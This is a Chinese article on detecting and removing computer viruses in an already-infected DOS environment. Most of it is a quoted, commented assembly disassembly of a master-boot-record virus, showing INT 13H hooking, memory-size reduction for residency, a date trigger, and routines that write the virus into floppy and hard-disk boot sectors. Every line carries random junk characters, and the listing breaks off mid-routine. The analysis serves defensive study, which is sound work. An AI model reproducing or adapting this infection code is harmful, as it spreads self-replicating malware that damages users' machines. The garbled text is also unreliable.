近年来,新的计算机病毒发展十分猖獗,而且这些新病毒更加隐蔽 、复杂,某些新病毒所具有的破坏性更大,所带来的损失无法估量 。这表明计算机病毒的防治尤为重要,同时所面临的形势也更加严 峻 。本文就在带毒环境下检测清除病毒的方法问题提出一点体会与看法 。 ||>4XDV#
?? | bRU=dg
?? 一 、 带毒环境下检测清除病毒的意义 [K$5Rm5
?? $8rnf
?? 目前在我国流行的病毒一般可分为引导型病毒 、文件型病毒和混合型病毒 。引导型病毒的特点是它寄生在软盘的DOS引导扇区和硬盘的主引导记录或DOS引导区中 ,开机时由计算机自动读入内存中执行文件型病毒则将自身附加在可执行文件上 ,在执行被感染程序时,病毒首先获得控制权,进行驻留或破坏等活动。混合型病毒既能感染引导区也能感染可执行文件,具有更强的传染性。常用的杀毒软件有瑞星2004、金山毒霸、KV300 、公安部的KILL 、美国McAfee公司的SCAN和CLEAN等 ,这些软件各有自身的优点。但是在一个带毒的环境下,也即在病毒已经驻留在内存中的情况下,这些杀毒软件都存在不足并可能带来一些不良的后果。 '(FC
?? IycZ\^5 *-
?? 当系统感染一种已知病毒时,KILL和SCAN 发现内存中有病毒后,一般是拒绝继续执行,并要求用干净的盘重新启动。KV300发现类似的警告信息,但提供给用户一个选择的机会,以确定是否继续执行, 很显然 ,若用户选择继续 ,所带来的后果是不可预期的。 [#mkTY
?? r'jUB^E
?? 当系统感染一种未知病毒时,三种软件在未发现内存中有已知病毒后,都假设系统中无病毒,忠实地执行检测或清除功能。事实上,这个未知病毒可能会在检测时传染盘中所有的可执行文件。 &>C+5`bg
?? "WuUMt
?? 由上面的讨论可知,清查病毒时只有从绝对干净的盘启动,而且要求杀毒软件自身无毒,才能够保证万无一失。然而,由于人们相互拷贝各种软件,很大程度上帮助了病毒的传播,在许多情况下, 要获得一张干净的启动盘很不容易,并且对于一些对计算机系统了解不是很多的使用者来说,他们根本 无法断定一张启动盘是不是干净的。因此,探讨在带毒环境下进行病毒检测和清除的方法是很有意义的 。 mjWU0.
?? Y|Q(JX
?? 二 、带毒环境下检测清除病毒的原理 E`I(x&_
?? 9D+k71"+
?? 对于一个驻留内存伺机进行传染和破坏的病毒来说,一般都要截取某些中断向量,当其他程序调用这些中断时,病毒重新取得控制权,判断是否满足特定的条件,满足则激活传染或破坏部分,在条件不满足的情况下一般是调用原中断服务程序,实现正常的系统功能。 -f&vH_eK
?? 引导型病毒常接管INT13H、08H、10H等中断;文件型病毒则常接管INT21H、24H、25H、26H、1CH 、13H、10H等中断。 !5(DU~S*@S
l[c '%M |N
0t%]z!
举一个例子: 该例子转自黑白网络"一个主引导区病毒的分析 作者:sinister " e}1Q+h\
病毒体: w(&EZDe
JMP 01AF ;JMP到01AF \.}T_,I
DB 00 ;病毒标计 XQ9W
y
DW 00F5 ;此为搬到高位址后,远程跳转指令 wR@>U.XT@
DW 9F80 ;目的地,也就是跳下一个指令XOR AX,AX >fzyD(>
DB 02
j!>P7 8
DW 0003 ;此为软盘识别标记,硬盘为0007 OyVP_Yx,V
DW EC59 ; Lo1ySLo$G
DW F000 ;INT 13H的原入口 MGsQF #6]
. 05R"/r*
. myR{}G
. Lm~<BBp.
. 'k[qx}
. 38p"lT
XOR AX,AX ;清除AX G9^`cTvv'8
MOV DS,AX; ;让DS=0000 Z! O4hA4
CLI ;清I标志积存器 ~q}L13^k
MOV SS,AX ;把堆栈设为0000:7C00也就是开机 (g@\QdH`|
MOV AX,7C00 ;后载入引导分区表的地址,目前地址 mdEJ'];AH
MOV SP,AX ;开机时为0000:7CB6 0|FxSc
STI ;设I标志积存器 'Og@<~/Xy
PUSH DS ;把DS=0000,AX=7C00压栈,留给0B33:024A ?LmeZ}K
PUSH AX ;用RETF,把程序转到引导或分区表位置 Bh2l3J4X
MOV AX,[004C] ;取中断向量表中,INT 13H的偏移位置 <[)-Q~Gg5
MOV [7C0A],AX ;保存INT 13H的偏移位置,也就是存在 W&Fm;m@M
MOV AX,[004E] ;取INT 13H的段地址 9GH5
MOV [7C0C],AX ;存到010C 8#yu.\N.xt
;以上是HOOK系统读写盘调用INT 13用病毒体替代原INT 13 yiQ ?p:DM
;读写以便传播发作 1#6emMV.`
H?];8wq$G
MOV AX,[0413] ;取得内存K数,放在AX d,Aa8I
DEC AX ; L? DlR hu
DEC AX ;减2k内存 9=ygkP Y
MOV [0413],AX ;存回,通常是638K $ ubU"
MOV CL,06 ; (l^7EpNs
SHL AX,CL ; O'wmhLa"W
MOV ES,AX ;算出减2K后病毒本体的位址 bpwA|H%{M
MOV [7C05],AX ;AX存入0105 O|,9EOrP
p?y2j
;病毒常用手法将系统高段内存减少以便驻留 o13jd NQ-
;这样可以免于被其他程序覆盖 ")Not$8
|T""v_q
MOV AX,000E ;病毒拦INT 13H 'JMW.;Lh?X
;ISR起始的偏移量 *^|\#UIk
MOV [004C],AX ; ?d-w#<AiV
MOV [004E],ES ;设原为病毒的INT 13H BA:x*(%~
MOV CX,01BE ;病毒长度为1BE 'c7nh{F
MOV SI,7C00 ;从JMP 01AF开始 x^[,0?y2
XOR DI,DI ;DI=0 1OMXg=Y
CLD ;清方向标志 Gy/w #4xj
REPZ; uKP4ur@1
MOVSB ;CX=1BE,将病毒自身搬移到高位址,目地是使其引导或 FSA%,b;U
CS: ;分区表能载入0000:7C00正常运作 \uOM,98xS
JMP FAR [7C03] ;跳到为搬过后的位址 '_G\_h}5
XOR AX,AX ;清AX q k^FyZ<
MOV ES,AX ;ES=0000 I;t@wbY,
INT 13 ;复位磁盘 tJ6@Ot
PUSH CS ; J;>epM;*
POP DS ;让DS=CS CVa>5vt
MOV AX,0201 ;用INT 13H读一扇区,是引导,或分区表则 1z8"Gk6
MOV BX,7C00 ;读到0000:7C00 z9ADF(J?0'
MOV CX,[0008] ;硬盘第0道,第7扇区 ]@Zv94Z(
CMP CX,+07 ;比较是否从硬盘启动 6i[Ts0H%<!
JNZ 0213 ;不是跳0213 >N Bc-DX^
MOV DX,0080 ;第一硬盘C:第零面 'NlhLu
INT 13 ;用INT 13号中断,读 nU>P%|loXx
JMP 023E ;跳023E比较日期,发作或正常开机 pNb2t/8%%
MOV CX,[0008] ;软盘0道,第3扇区 eZPeyYX
MOV DX,0100 ;A:的第0面 )*]A$\Oc[
INT 13 ;INT 13读盘 R7Y_ 7@p
JB 023E ;失败跳023E x8rg/y
PUSH CS =:s`C,l.4
POPES ;让ES=CS US ALoe
MOV AX,0201 ; ;nBf
MOV BX,0200 ; Wn=sF,c
MOV CX,0001 ; c9-$^yno
MOV DX,0080 ; <l5i%?
INT 13 ;读入C:的分区表到0200,以便下面比较 =tP9n ;D
JB 023E ;失败跳023E nv:Qd\UM
XOR SI,SI ;清SI T%eBgseS
CLD ;清方向标志以便比较 JI-i7P
LODSW ;载入一个WORD到AX cpjwc@UMe
CMP AX,[BX] ;比较有无病毒存在..E9AC H:c5
q0O^x
JNZ 0287 ;没有则跳0287传染 9i5?J ]o^
LODSW ;载入一个WORD到AX (lM,'
CMP AX,[BX+02] ;再次确认..0000 X
61|:E
JNZ 0287 ;没有跳0287 9S|sTf
XOR CX,CX ;清CX \ZLi Y
MOV AH,04 ; $K^l=X
INT 1A ;取得日期 #h[>RtP:
CMP DX,0306 ;是否为三月六日 (I}owr 5:
JZ 024B ;是跳024B传染 eK:?~BI!
RETF ;把程序交还给引导启动完成 #-'`Ybw
,-e}Xw9
步骤4:病毒INT 13代码分析 GGuU(sL*
方法:U $IE}fgA@5
PUSH DS ;首先把要用到积存器 Z0L($
PUSH AX ;入栈保存 AabQ)23R2
OR DL,DL ;比较是否为软盘 =PRQ3/?5
JNZ 002F ;如不是则退出传染 ,-AF8BP
XOR AX,AX ;AX=0 n?@zp<
MOV DS,AX ;数据代段=0 s=n4'`y1
TEST BYTE PTR [043F],01 ;比较是否为A盘 ^w^e~0
S
JNZ 002F ;不是则退出 <!sLfz?
POP AX ;将以上保存积存器 @Ul3J )=m
POP DS ;弹栈恢复 MQ!4"E5"j
PUSHF ;压栈标志积存器 epiviCYC
CS: ;以便执行原INT 13 B"&-) (
CALL FAR [000A] ;执行原INT 13 :8)Jnh\5
PUSHF ;再次压栈 'v]0;~\mp>
CALL 0036 ;以便跳转到传染程序 #BLHHK/[
POPF ;跳转到执行传染 AZ3T#f![L@
RETF 0002 ;结束中断调用返回 .|O T#"LP
POP AX ;恢复 /q IQE&V-
POP DS ;堆栈 |_TiF;^
CS: ;跳转到原正常INT 13 >
ubq{'
JMP FAR [000A] ;地址执行 7\
_MA!:<
f7_(C0d
;此段代码中展现了病毒常用手法,利用标志积存器做跳转 ?y-^Fq|h
?kO.>o
步骤5:传染过程分析 _c>ww<*3
方法:U |c/=9Bb
对软盘传染过程: dun`/QKV
PUSH AX ;工 U*C^g}iA
PUSH BX ;作
J
8%gC
PUSH CX ;寄 r/sSkF F
PUSH DX ;存 GI]\
PUSH DS ;器 0&,D&y%
PUSH ES ;入 m%[e_eS
PUSH SI ;栈 1cK'B<5">]
PUSH DI ;保存 XH?//.q
PUSH CS ;以压/弹栈方式 u}nS dZC
POP DS ;使数据段DS和 %/Wk+r9uu
PUSH CS ;附加段ES均指向 n&:ohOH%
POP ES ;代码段CS qk<jvha
MOV SI,0004 ;试4次 bSsg`
MOV AX,0201 ;设置各 ]:gW+6w"C
MOV BX,0200 ;积存器 Ok_}d&A
MOV CX,0001 ;为读软盘 9w=7A>.U
XOR DX,DX ;引导扇区做准备 +7gd1^|$e
PUSHF ;压栈标志积存器 x &R9m,
CALL FAR [000A] ;正常的INT 13调用 |HmY`w6*z
JNB 0063 ;成功则转判断 PMytk`<`zw
XOR AX,AX ;不成功复位 cHvm
PUSHF ;磁盘继续读 ,H{9`a#+:
CALL FAR [000A] ;如果4次 c7XBZ%D
DEC SI ;均匀不成功 ,'s}g,L
JNZ 0045 ;则退出跳转 ?62Im^1/
JMP 00A6 ;退出传染 %nZ:)J>kz
XOR SI,SI ;SI=0以便用 9`*ST(0/
CLD ;LODSW读入软盘 %hSQ\T<8[o
LODSW ;第1或第2字进行比较 j,j|'7J%
CMP AX,[BX] ;比较如果不包含病毒标志 "TA0--6
JNZ 0071 ;则跳转写传染 eNd&47lJ
LODSW ;如果已有标志 qzZ/%{Ak
CMP AX,[BX+02] ;则退出 t<UJR*R=L
JZ 00A6 ;传染子程序 nFQuoU]ux
MOV AX,0301 ;为写盘准备 JVIFpN" `
MOV DH,01 ;如果是360K DquLr+s~
MOV CL,03 ;则写到1面0道3扇区 s0iG|vw
CMP BYTE PTR [BX+15],FD ;比较软盘
Ey:68yU
JZ 0080 ;如果大于360K tB4mhX|\
MOV CL,0E ;写到1面0道14扇区 9f!
M1
MOV [0008],CX ;写病毒标志到软盘 ~$u9
PUSHF ;调用原INT 13 -0^]:
CALL FAR [000A] ;进行传染 g=t`3X#d
JB 00A6 v'i'I/
MOV SI,03BE ;以下是将正常 KZ%i&w#<
MOV DI,01BE ;引导扇区从 |]9@JdmV
MOV CX,0021 ;1BE起的21字节内容 T01Iu
CLD ;搬移到病毒程序尾部 { U;yW)
REPZ ;开始复制 x-[ItJ% l
MOVSW to?! qxn
MOV AX,0301 ;写盘功能调用,写一个扇区 1sHjM%
XOR BX,BX ;将病毒程序 mXz*Gi
MOV CX,0001 ;写入软盘引导扇区内 $9`#p/V
XOR DX,DX ;设置为软盘 uHKEt[PS$
PUSHF ..JRtuM-v
CALL FAR [000A] ;执行正常INT 13调用写盘 U823q-x
POP DI ;将 M8~3 0L
POP SI ;工 FaeKDbLJr
POP ES ;作 9vV==A#
POP DS ;寄 vaB ql(?'2
POP DX ;存 4
.
7X*1
POP CX ;器 F@?-^ E@
POP BX ;退 hVF^"$
POP AX ;栈 :IZAdlz[@
RET ;返回调用处 S"&Gutu3o
对硬盘传染过程: >`AK'K8{M
MOV CX,0007 ;第7扇区 ~2Wus8X-
MOV [0008],CX ;此处为硬盘引导标记 #Nh'1@@
MOV AX,301 ;写功能调用 EnWv9I<
MOV DX,0080 ;设置为硬盘 -Rpra0o.
C
INT 13 ;将正常引导扇区写到0面0道7扇区内 <